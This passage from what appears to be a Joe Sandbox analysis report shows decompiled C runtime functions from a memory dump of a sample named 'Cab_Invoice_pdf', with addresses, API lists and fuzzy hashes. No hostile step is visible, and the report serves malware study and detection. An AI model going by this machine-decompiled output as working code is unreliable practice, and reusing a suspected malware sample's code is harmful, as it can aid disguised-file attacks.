				intOrPtr _t122;
				intOrPtr* _t123;
				void* _t127;
				void* _t129;

				_push(_t74);
				_push(_t74);
				_t107 = _a4;
				_t102 = 0;
				_t115 = _t107;
				_t32 =  *_t107;
				while(_t32 != 0) {
					if(_t32 != 0x3d) {
						_t102 = _t102 + 1;
					}
					_t75 = _t115;
					_t68 = _t75 + 1;
					do {
						_t33 =  *_t75;
						_t75 = _t75 + 1;
					} while (_t33 != 0);
					_t74 = _t75 - _t68;
					_t115 = _t115 + 1 + _t75 - _t68;
					_t32 =  *_t115;
				}
				_t3 = _t102 + 1; // 0x1
				_t69 = E01320B10(_t74, _t3, 4);
				if(_t69 == 0) {
					L19:
					_t69 = 0;
					goto L20;
				} else {
					_v8 = _t69;
					while( *_t107 != 0) {
						_t79 = _t107;
						_t103 = _t79 + 1;
						do {
							_t38 =  *_t79;
							_t79 = _t79 + 1;
						} while (_t38 != 0);
						_t80 = _t79 - _t103;
						_t39 = _t79 - _t103 + 1;
						_v12 = _t39;
						if( *_t107 == 0x3d) {
							L15:
							_t107 = _t107 + _t39;
							continue;
						} else {
							_t40 = E01320B10(_t80, _t39, 1); // executed
							_t118 = _t40;
							_pop(_t82);
							if(_t118 == 0) {
								_push(_t69);
								L45();
								E013209EB(0);
								goto L19;
							} else {
								_t42 = E01320A73(_t118, _v12, _t107);
								_t129 = _t129 + 0xc;
								if(_t42 != 0) {
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									E01321798();
									asm("int3");
									_t127 = _t129;
									_push(_t82);
									_push(_t82);
									_push(_t69);
									_t71 = _v40;
									_v56 = 0;
									_t104 = 0;
									_push(_t118);
									_push(_t107);
									_t46 =  *_t71 & 0x0000ffff;
									_t119 = _t71;
									if(_t46 != 0) {
										_t73 = 0x3d;
										do {
											if(_t46 != _t73) {
												_t104 = _t104 + 1;
											}
											_t99 = _t119;
											_t14 =  &(_t99[1]); // 0x2
											_t113 = _t14;
											do {
												_t63 =  *_t99;
												_t99 =  &(_t99[1]);
											} while (_t63 != _v16);
											_t82 = _t99 - _t113 >> 1;
											_t119 =  &(( &(_t119[_t99 - _t113 >> 1]))[1]);
											_t46 =  *_t119 & 0x0000ffff;
										} while (_t46 != 0);
										_t71 = _v0;
									}
									_t19 = _t104 + 1; // 0x1
									_t109 = E01320B10(_t82, _t19, 4);
									_t120 = 0;
									if(_t109 == 0) {
										L42:
										_t109 = _t120;
										goto L43;
									} else {
										_v12 = _t109;
										while( *_t71 != _t120) {
											_t88 = _t71;
											_t21 =  &(_t88[1]); // 0x2
											_t105 = _t21;
											do {
												_t51 =  *_t88;
												_t88 =  &(_t88[1]);
											} while (_t51 != _t120);
											_t90 = _t88 - _t105 >> 1;
											_t22 = _t90 + 1; // -1
											_t52 = _t22;
											_t91 = 0x3d;
											_v16 = _t52;
											if( *_t71 == _t91) {
												L38:
												_t71 =  &(_t71[_t52]);
												continue;
											} else {
												_t122 = E01320B10(_t91, _t52, 2);
												if(_t122 == 0) {
													_push(_t109);
													L45();
													_t120 = 0;
													E013209EB(0);
													goto L42;
												} else {
													_t55 = E0132618C(_t122, _v16, _t71);
													_t129 = _t129 + 0xc;
													if(_t55 != 0) {
														_push(0);
														_push(0);
														_push(0);
														_push(0);
														_push(0);
														_t57 = E01321798();
														asm("int3");
														_push(_t127);
														_push(_t122);
														_t123 = _v84;
														if(_t123 != 0) {
															_t58 =  *_t123;
															_push(_t109);
															_t111 = _t123;
															while(_t58 != 0) {
																E013209EB(_t58);
																_t111 = _t111 + 4;
																_t58 =  *_t111;
															}
															_t57 = E013209EB(_t123);
														}
														return _t57;
													} else {
														_t60 = _v12;
														 *_t60 = _t122;
														_t120 = 0;
														_v12 = _t60 + 4;
														E013209EB(0);
														_t52 = _v16;
														goto L38;
													}
												}
											}
											goto L51;
										}
										L43:
										E013209EB(_t120);
										return _t109;
									}
								} else {
									_t64 = _v8;
									 *_t64 = _t118;
									_v8 = _t64 + 4;
									E013209EB(0);
									_t39 = _v12;
									goto L15;
								}
							}
						}
						goto L51;
					}
					L20:
					E013209EB(0);
					return _t69;
				}
				L51:
			}




















































                            0x0131fb6b
                            0x0131fb6c
                            0x0131fb70
                            0x0131fb73
                            0x0131fb75
                            0x0131fb77
                            0x0131fb93
                            0x0131fb7d
                            0x0131fb7f
                            0x0131fb7f
                            0x0131fb80
                            0x0131fb82
                            0x0131fb85
                            0x0131fb85
                            0x0131fb87
                            0x0131fb88
                            0x0131fb8c
                            0x0131fb8f
                            0x0131fb91
                            0x0131fb91
                            0x0131fb97
                            0x0131fba2
                            0x0131fba8
                            0x0131fc17
                            0x0131fc17
                            0x00000000
                            0x0131fbaa
                            0x0131fbaa
                            0x0131fc01
                            0x0131fbaf
                            0x0131fbb1
                            0x0131fbb4
                            0x0131fbb4
                            0x0131fbb6
                            0x0131fbb7
                            0x0131fbbb
                            0x0131fbc0
                            0x0131fbc3
                            0x0131fbc6
                            0x0131fbff
                            0x0131fbff
                            0x00000000
                            0x0131fbc8
                            0x0131fbcb
                            0x0131fbd0
                            0x0131fbd3
                            0x0131fbd6
                            0x0131fc08
                            0x0131fc09
                            0x0131fc10
                            0x00000000
                            0x0131fbd8
                            0x0131fbdd
                            0x0131fbe2
                            0x0131fbe7
                            0x0131fc2c
                            0x0131fc2d
                            0x0131fc2e
                            0x0131fc2f
                            0x0131fc30
                            0x0131fc31
                            0x0131fc36
                            0x0131fc3a
                            0x0131fc3c
                            0x0131fc3d
                            0x0131fc3e
                            0x0131fc3f
                            0x0131fc44
                            0x0131fc47
                            0x0131fc49
                            0x0131fc4a
                            0x0131fc4b
                            0x0131fc4e
                            0x0131fc53
                            0x0131fc57
                            0x0131fc58
                            0x0131fc5b
                            0x0131fc5d
                            0x0131fc5d
                            0x0131fc5e
                            0x0131fc60
                            0x0131fc60
                            0x0131fc63
                            0x0131fc63
                            0x0131fc66
                            0x0131fc69
                            0x0131fc71
                            0x0131fc76
                            0x0131fc79
                            0x0131fc7c
                            0x0131fc81
                            0x0131fc81
                            0x0131fc84
                            0x0131fc8f
                            0x0131fc91
                            0x0131fc97
                            0x0131fd12
                            0x0131fd12
                            0x00000000
                            0x0131fc99
                            0x0131fc99
                            0x0131fcfb
                            0x0131fc9e
                            0x0131fca0
                            0x0131fca0
                            0x0131fca3
                            0x0131fca3
                            0x0131fca6
                            0x0131fca9
                            0x0131fcb0
                            0x0131fcb4
                            0x0131fcb4
                            0x0131fcb7
                            0x0131fcb8
                            0x0131fcbe
                            0x0131fcf8
                            0x0131fcf8
                            0x00000000
                            0x0131fcc0
                            0x0131fcc8
                            0x0131fcce
                            0x0131fd02
                            0x0131fd03
                            0x0131fd08
                            0x0131fd0b
                            0x00000000
                            0x0131fcd0
                            0x0131fcd5
                            0x0131fcda
                            0x0131fcdf
                            0x0131fd26
                            0x0131fd27
                            0x0131fd28
                            0x0131fd29
                            0x0131fd2a
                            0x0131fd2b
                            0x0131fd30
                            0x0131fd33
                            0x0131fd36
                            0x0131fd37
                            0x0131fd3c
                            0x0131fd3e
                            0x0131fd40
                            0x0131fd41
                            0x0131fd51
                            0x0131fd46
                            0x0131fd4b
                            0x0131fd4e
                            0x0131fd50
                            0x0131fd56
                            0x0131fd5c
                            0x0131fd5f
                            0x0131fce1
                            0x0131fce1
                            0x0131fce4
                            0x0131fce6
                            0x0131fcec
                            0x0131fcef
                            0x0131fcf4
                            0x00000000
                            0x0131fcf7
                            0x0131fcdf
                            0x0131fcce
                            0x00000000
                            0x0131fcbe
                            0x0131fd14
                            0x0131fd15
                            0x0131fd23
                            0x0131fd23
                            0x0131fbe9
                            0x0131fbe9
                            0x0131fbee
                            0x0131fbf3
                            0x0131fbf6
                            0x0131fbfb
                            0x00000000
                            0x0131fbfe
                            0x0131fbe7
                            0x0131fbd6
                            0x00000000
                            0x0131fbc6
                            0x0131fc19
                            0x0131fc1b
                            0x0131fc29
                            0x0131fc29
                            0x00000000

                            APIs
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: _free
                            • String ID:
                            • API String ID: 269201875-0
                            • Opcode ID: 72ff7c364c1fa7efa34b02dcdfad83067f22caec69e9aeeb4cf395e5ff3d9ce6
                            • Instruction ID: d806dcccb88e436ddc96443788fc935bc7e1fad7a1661a56e91cffe9e779ba25
                            • Opcode Fuzzy Hash: 72ff7c364c1fa7efa34b02dcdfad83067f22caec69e9aeeb4cf395e5ff3d9ce6
                            • Instruction Fuzzy Hash: CF2190726082166FFF1CAE7C9850BBABBACDF4532CF14419AE94597145EA728C0E8290
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0132B2EE, Relevance: 4.6, APIs: 3, Instructions: 80COMMON
                            Download Yara Rule
                            C-Code - Quality: 74%
                            			E0132B2EE(void* __edx, void* __eflags) {
				signed int _v8;
				char _v264;
				char _v268;
				char _v272;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t10;
				void* _t14;
				void* _t17;
				signed int _t21;
				void* _t27;
				signed int _t36;
				void* _t38;
				signed int _t42;
				signed int _t44;
				signed int _t45;

				_t10 =  *0x133c008; // 0xa212446c
				_v8 = _t10 ^ _t45;
				 *0x133c91c =  *0x133c91c | 0xffffffff;
				 *0x133c910 =  *0x133c910 | 0xffffffff;
				_push(_t38);
				_t25 = "TZ";
				_t36 = 0;
				 *0x1346578 = 0;
				_t14 = E01326CC0("TZ", __edx, 0, _t38, __eflags,  &_v268,  &_v264, 0x100, "TZ"); // executed
				if(_t14 != 0) {
					__eflags = _t14 - 0x22;
					if(__eflags == 0) {
						_t44 = E01320A25(_t27, _v268);
						__eflags = _t44;
						if(__eflags != 0) {
							_t21 = E01326CC0(_t25, __edx, 0, _t44, __eflags,  &_v272, _t44, _v268, _t25);
							__eflags = _t21;
							if(_t21 == 0) {
								E013209EB(0);
								_t36 = _t44;
							} else {
								_push(_t44);
								goto L5;
							}
						} else {
							_push(0);
							L5:
							E013209EB();
						}
					}
				} else {
					_t36 =  &_v264;
				}
				asm("sbb esi, esi");
				_t42 =  ~(_t36 -  &_v264) & _t36;
				if(_t36 == 0) {
					L13:
					E0132B193(__eflags); // executed
				} else {
					_t52 =  *_t36;
					if( *_t36 == 0) {
						goto L13;
					} else {
						_push(_t36);
						E0132AFBE(_t52);
					}
				}
				_t17 = E013209EB(_t42);
				E0131786A();
				return _t17;
			}





















                            0x0132b2f9
                            0x0132b300
                            0x0132b303
                            0x0132b310
                            0x0132b318
                            0x0132b31a
                            0x0132b31f
                            0x0132b32e
                            0x0132b335
                            0x0132b33f
                            0x0132b349
                            0x0132b34c
                            0x0132b359
                            0x0132b35c
                            0x0132b35e
                            0x0132b377
                            0x0132b37f
                            0x0132b381
                            0x0132b387
                            0x0132b38c
                            0x0132b383
                            0x0132b383
                            0x00000000
                            0x0132b383
                            0x0132b360
                            0x0132b360
                            0x0132b361
                            0x0132b361
                            0x0132b361
                            0x0132b38e
                            0x0132b341
                            0x0132b341
                            0x0132b341
                            0x0132b39b
                            0x0132b39d
                            0x0132b3a1
                            0x0132b3b1
                            0x0132b3b1
                            0x0132b3a3
                            0x0132b3a3
                            0x0132b3a6
                            0x00000000
                            0x0132b3a8
                            0x0132b3a8
                            0x0132b3a9
                            0x0132b3ae
                            0x0132b3a6
                            0x0132b3b7
                            0x0132b3c5
                            0x0132b3cd

                            APIs
                            • _free.LIBCMT ref: 0132B361
                            • _free.LIBCMT ref: 0132B3B7
                              • Part of subcall function 0132B193: _free.LIBCMT ref: 0132B1EB
                              • Part of subcall function 0132B193: GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,01339410), ref: 0132B1FD
                              • Part of subcall function 0132B193: WideCharToMultiByte.KERNEL32(00000000,00000000,Pacific Standard Time,000000FF,00000000,0000003F,00000000,?,?), ref: 0132B275
                              • Part of subcall function 0132B193: WideCharToMultiByte.KERNEL32(00000000,00000000,Pacific Daylight Time,000000FF,?,0000003F,00000000,?), ref: 0132B2A2
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: _free$ByteCharMultiWide$InformationTimeZone
                            • String ID:
                            • API String ID: 314583886-0
                            • Opcode ID: a6c87e5752ac59b2601ed8750f91b9f38d6659ca7991270cbb850c9cf4a0d427
                            • Instruction ID: 3fb1dff9025f87a56e7a421d8e40114891833e7c12c29ce40a85e95ff70c8e7a
                            • Opcode Fuzzy Hash: a6c87e5752ac59b2601ed8750f91b9f38d6659ca7991270cbb850c9cf4a0d427
                            • Instruction Fuzzy Hash: 39213B72D0013997DB31B6299C81EEAF77CDB5176CF100396EE55A3188EF704E85CA91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 013218F4, Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E013218F4(void* __eflags, signed int _a4) {
				intOrPtr _t13;
				int _t15;
				void* _t21;
				signed int _t33;
				long _t35;

				_t33 = _a4;
				if(E0131E926(_t33) != 0xffffffff) {
					_t13 =  *0x1346108; // 0xe4e818
					if(_t33 != 1 || ( *(_t13 + 0x88) & 0x00000001) == 0) {
						if(_t33 != 2 || ( *(_t13 + 0x58) & 0x00000001) == 0) {
							goto L7;
						} else {
							goto L6;
						}
					} else {
						L6:
						_t21 = E0131E926(2);
						if(E0131E926(1) == _t21) {
							goto L1;
						}
						L7:
						_t15 = FindCloseChangeNotification(E0131E926(_t33)); // executed
						if(_t15 != 0) {
							goto L1;
						}
						_t35 = GetLastError();
						L9:
						E0131E895(_t33);
						 *((char*)( *((intOrPtr*)(0x1346108 + (_t33 >> 6) * 4)) + 0x28 + (_t33 & 0x0000003f) * 0x30)) = 0;
						if(_t35 == 0) {
							return 0;
						}
						return E0131C998(_t35) | 0xffffffff;
					}
				}
				L1:
				_t35 = 0;
				goto L9;
			}








                            0x013218fb
                            0x01321908
                            0x0132190e
                            0x01321916
                            0x01321924
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0132192c
                            0x0132192c
                            0x0132192e
                            0x01321940
                            0x00000000
                            0x00000000
                            0x01321942
                            0x0132194a
                            0x01321952
                            0x00000000
                            0x00000000
                            0x0132195a
                            0x0132195c
                            0x0132195d
                            0x01321975
                            0x0132197c
                            0x00000000
                            0x0132198a
                            0x00000000
                            0x01321985
                            0x01321916
                            0x0132190a
                            0x0132190a
                            0x00000000

                            APIs
                            • FindCloseChangeNotification.KERNEL32(00000000,00000000,?,?,01321812,?), ref: 0132194A
                            • GetLastError.KERNEL32(?,01321812,?), ref: 01321954
                            • __dosmaperr.LIBCMT ref: 0132197F
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                            • String ID:
                            • API String ID: 490808831-0
                            • Opcode ID: 29d2c630784377cf0ccebc878c102d6d304470df9d813f225e95b50307b17152
                            • Instruction ID: 7712a720c87032ec3d63ec1deb2b8941de7effacdfa71fff847beda122c05e30
                            • Opcode Fuzzy Hash: 29d2c630784377cf0ccebc878c102d6d304470df9d813f225e95b50307b17152
                            • Instruction Fuzzy Hash: E1016133B0423517DBBA323CA94477DAB4E8B8677CF250129ED09CB1C6DE65D88182D0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0132276E, Relevance: 4.6, APIs: 3, Instructions: 50COMMONLIBRARYCODE
                            Download Yara Rule
                            C-Code - Quality: 86%
                            			E0132276E(void* __ecx, void* __eflags, signed int _a4, union _LARGE_INTEGER _a8, union _LARGE_INTEGER* _a12, intOrPtr _a16) {
				signed int _v8;
				void* _v12;
				void* _t15;
				int _t16;
				signed int _t19;
				signed int _t32;
				signed int _t33;
				signed int _t36;

				_t36 = _a4;
				_push(_t32);
				_t15 = E0131E926(_t36);
				_t33 = _t32 | 0xffffffff;
				if(_t15 != _t33) {
					_push(_a16);
					_t16 = SetFilePointerEx(_t15, _a8, _a12,  &_v12); // executed
					if(_t16 != 0) {
						if((_v12 & _v8) == _t33) {
							goto L2;
						} else {
							_t19 = _v12;
							_t39 = (_t36 & 0x0000003f) * 0x30;
							 *( *((intOrPtr*)(0x1346108 + (_t36 >> 6) * 4)) + _t39 + 0x28) =  *( *((intOrPtr*)(0x1346108 + (_t36 >> 6) * 4)) + 0x28 + (_t36 & 0x0000003f) * 0x30) & 0x000000fd;
						}
					} else {
						E0131C998(GetLastError());
						goto L2;
					}
				} else {
					 *((intOrPtr*)(E0131C9CE())) = 9;
					L2:
					_t19 = _t33;
				}
				return _t19;
			}











                            0x01322776
                            0x01322779
                            0x0132277b
                            0x01322780
                            0x01322786
                            0x01322799
                            0x013227a7
                            0x013227af
                            0x013227ca
                            0x00000000
                            0x013227cc
                            0x013227cc
                            0x013227d7
                            0x013227e1
                            0x013227e1
                            0x013227b1
                            0x013227b8
                            0x00000000
                            0x013227bd
                            0x01322788
                            0x0132278d
                            0x01322793
                            0x01322793
                            0x01322795
                            0x013227eb

                            APIs
                            • SetFilePointerEx.KERNEL32(00000000,00000000,00000002,?,00000000,?,00000000,?,?,?,0132281D,?,00000000,00000002,00000000), ref: 013227A7
                            • GetLastError.KERNEL32(?,0132281D,?,00000000,00000002,00000000,?,01323143,00000000,00000000,00000000,00000002,00000000,?,00000000), ref: 013227B1
                            • __dosmaperr.LIBCMT ref: 013227B8
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ErrorFileLastPointer__dosmaperr
                            • String ID:
                            • API String ID: 2336955059-0
                            • Opcode ID: 02afdac78791472bed70760892371673686be6b007f06494764c2f287149006d
                            • Instruction ID: 5088f0b0bf909b83912d538d01cba551c42da1468600141f4c559c53e6c25e06
                            • Opcode Fuzzy Hash: 02afdac78791472bed70760892371673686be6b007f06494764c2f287149006d
                            • Instruction Fuzzy Hash: 3E01F037614519ABCF159F6DDC048AF7B1EDB85334F140255F8119B185EB71DD4187D0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0131CA68, Relevance: 3.1, APIs: 2, Instructions: 101COMMON
                            Download Yara Rule
                            C-Code - Quality: 62%
                            			E0131CA68(WCHAR* _a4, void* _a8) {
				void* _v8;
				void _v56;
				void* __edi;
				signed int _t17;
				void* _t18;
				signed int _t19;
				signed int _t20;
				intOrPtr* _t25;
				signed int _t26;
				signed int _t34;
				signed int _t36;
				void* _t39;
				signed int _t42;
				signed int _t44;
				void* _t45;
				WCHAR* _t49;
				void* _t56;
				intOrPtr _t59;
				void* _t60;
				void* _t62;

				if(_a8 != 0) {
					_push(_t45);
					_t34 = 0;
					E01318520(_t45,  &_v56, 0, 0x30);
					_t36 = 0xc;
					memcpy(_a8,  &_v56, _t36 << 2);
					_t62 = _t60 + 0x18;
					_t49 = _a4;
					__eflags = _t49;
					if(_t49 != 0) {
						_t17 = E01325190(_t49, L"?*");
						_pop(_t39);
						__eflags = _t17;
						if(_t17 == 0) {
							_t18 = CreateFileW(_t49, 0x80, 7, 0, 3, 0x2000000, 0); // executed
							_push(_a8);
							_t56 = _t18;
							_v8 = _t56;
							__eflags = _t56 - 0xffffffff;
							if(__eflags == 0) {
								_push(_t49);
								_t19 = E0131CB6F(_t39, _t44, _t49, __eflags);
							} else {
								_push(_t56);
								_push(0xffffffff);
								_push(_t49); // executed
								_t19 = E0131CBFB(_t44); // executed
								_t62 = _t62 + 0x10;
							}
							__eflags = _t19;
							if(_t19 == 0) {
								E01318520(_t49,  &_v56, _t34, 0x30);
								_t34 = _t34 | 0xffffffff;
								__eflags = _t34;
								_t42 = 0xc;
								memcpy(_a8,  &_v56, _t42 << 2);
								_t56 = _v8;
							}
							__eflags = _t56 - 0xffffffff;
							if(_t56 != 0xffffffff) {
								CloseHandle(_t56);
							}
							_t20 = _t34;
							L15:
							return _t20;
						}
						_t25 = E0131C9CE();
						_t59 = 2;
						 *_t25 = _t59;
						_t26 = E0131C9BB();
						 *_t26 = _t59;
						L6:
						_t20 = _t26 | 0xffffffff;
						goto L15;
					}
					 *(E0131C9BB()) = 0;
					 *((intOrPtr*)(E0131C9CE())) = 0x16;
					_t26 = E01321788();
					goto L6;
				}
				 *(E0131C9BB()) =  *_t29 & 0x00000000;
				 *((intOrPtr*)(E0131C9CE())) = 0x16;
				return E01321788() | 0xffffffff;
			}























                            0x0131ca74
                            0x0131ca98
                            0x0131ca9b
                            0x0131caa2
                            0x0131cab2
                            0x0131cab3
                            0x0131cab3
                            0x0131cab5
                            0x0131cab8
                            0x0131caba
                            0x0131cadb
                            0x0131cae1
                            0x0131cae2
                            0x0131cae4
                            0x0131cb0d
                            0x0131cb13
                            0x0131cb16
                            0x0131cb18
                            0x0131cb1b
                            0x0131cb1e
                            0x0131cb2e
                            0x0131cb2f
                            0x0131cb20
                            0x0131cb20
                            0x0131cb21
                            0x0131cb23
                            0x0131cb24
                            0x0131cb29
                            0x0131cb29
                            0x0131cb36
                            0x0131cb38
                            0x0131cb41
                            0x0131cb4f
                            0x0131cb4f
                            0x0131cb54
                            0x0131cb55
                            0x0131cb57
                            0x0131cb57
                            0x0131cb5a
                            0x0131cb5d
                            0x0131cb60
                            0x0131cb60
                            0x0131cb66
                            0x0131cb68
                            0x00000000
                            0x0131cb6a
                            0x0131cae6
                            0x0131caed
                            0x0131caee
                            0x0131caf0
                            0x0131caf5
                            0x0131caf7
                            0x0131caf7
                            0x00000000
                            0x0131caf7
                            0x0131cac1
                            0x0131cac8
                            0x0131cace
                            0x00000000
                            0x0131cace
                            0x0131ca7b
                            0x0131ca83
                            0x00000000

                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0b3d22fc2818e1b9c7d8198c823d1ea9e7bcc9a25d3c53b52a694d48b765a87d
                            • Instruction ID: 4e60c5844f1bc9349a7417f8750659f42c954b4913d449276790f675b670589d
                            • Opcode Fuzzy Hash: 0b3d22fc2818e1b9c7d8198c823d1ea9e7bcc9a25d3c53b52a694d48b765a87d
                            • Instruction Fuzzy Hash: 4331FB72880219BAEB297B6CDC41FAE372DEF4273CF105215F9646B1C4DB705D01D6A5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 013113D0, Relevance: 3.1, APIs: 2, Instructions: 77COMMON
                            Download Yara Rule
                            C-Code - Quality: 63%
                            			E013113D0(void* __edx, intOrPtr* _a4, intOrPtr _a8) {
				signed int _v4;
				void* _v8;
				char _v92;
				void* _v100;
				char _v104;
				signed int _t12;
				signed int _t14;
				void* _t17;
				void* _t21;
				intOrPtr* _t31;
				char* _t35;
				signed int _t42;
				void* _t43;

				_t42 =  &_v100;
				_t12 =  *0x133c008; // 0xa212446c
				_v4 = _t12 ^ _t42;
				_t31 = _a4;
				_t35 =  &_v92;
				_t21 = _a8 + 0xffffffa0;
				_t14 = E01319F16(__edx,  *_t31, _t21, 0); // executed
				_t43 = _t42 + 0xc;
				if(_t14 != 0) {
					L5:
					E0131786A();
					return _t14 | 0xffffffff;
				} else {
					_t14 = E01319B2B( &_v100, 0x60, 1,  *_t31); // executed
					_t43 = _t43 + 0x10;
					if(_t14 < 1) {
						goto L5;
					} else {
						while(1) {
							_t17 = E01319780(0x1330340, _t35, 8);
							_t43 = _t43 + 0xc;
							if(_t17 == 0) {
								break;
							}
							_t35 = _t35 - 1;
							_t14 =  &_v100;
							if(_t35 >= _t14) {
								continue;
							} else {
								goto L5;
							}
							goto L7;
						}
						asm("movups xmm0, [esi]");
						asm("movups [edi+0x10], xmm0");
						asm("movups xmm0, [esi+0x10]");
						asm("movups [edi+0x20], xmm0");
						asm("movups xmm0, [esi+0x20]");
						asm("movups [edi+0x30], xmm0");
						asm("movups xmm0, [esi+0x30]");
						asm("movups [edi+0x40], xmm0");
						asm("movups xmm0, [esi+0x40]");
						asm("movups [edi+0x50], xmm0");
						asm("movq xmm0, [esi+0x50]");
						asm("movq [edi+0x60], xmm0");
						_push( *((intOrPtr*)(_t31 + 0x18)));
						L01317864();
						 *((intOrPtr*)(_t31 + 4)) = _t35 -  &_v104 + _t21 - _t17 + 0x58;
						E0131786A();
						return 0;
					}
				}
				L7:
			}
















                            0x013113d0
                            0x013113d3
                            0x013113da
                            0x013113e5
                            0x013113e9
                            0x013113ef
                            0x013113f5
                            0x013113fa
                            0x013113ff
                            0x0131143d
                            0x01311449
                            0x01311451
                            0x01311401
                            0x0131140c
                            0x01311411
                            0x01311417
                            0x00000000
                            0x01311420
                            0x01311420
                            0x01311428
                            0x0131142d
                            0x01311432
                            0x00000000
                            0x00000000
                            0x01311434
                            0x01311435
                            0x0131143b
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0131143b
                            0x01311452
                            0x01311455
                            0x01311459
                            0x0131145d
                            0x01311461
                            0x01311465
                            0x01311469
                            0x0131146d
                            0x01311471
                            0x01311475
                            0x01311479
                            0x0131147e
                            0x01311483
                            0x01311486
                            0x0131149e
                            0x013114a6
                            0x013114ae
                            0x013114ae
                            0x01311417
                            0x00000000

                            APIs
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: __fread_nolockhtonl
                            • String ID:
                            • API String ID: 822407656-0
                            • Opcode ID: 012f51b5b7b31a088673919ea0ca95313ad4acad09730e1f68a6e2fa3f4b8288
                            • Instruction ID: 556056ec954d51a1965f5073cb3e38887b137cc2307528d74eb4faed9977456f
                            • Opcode Fuzzy Hash: 012f51b5b7b31a088673919ea0ca95313ad4acad09730e1f68a6e2fa3f4b8288
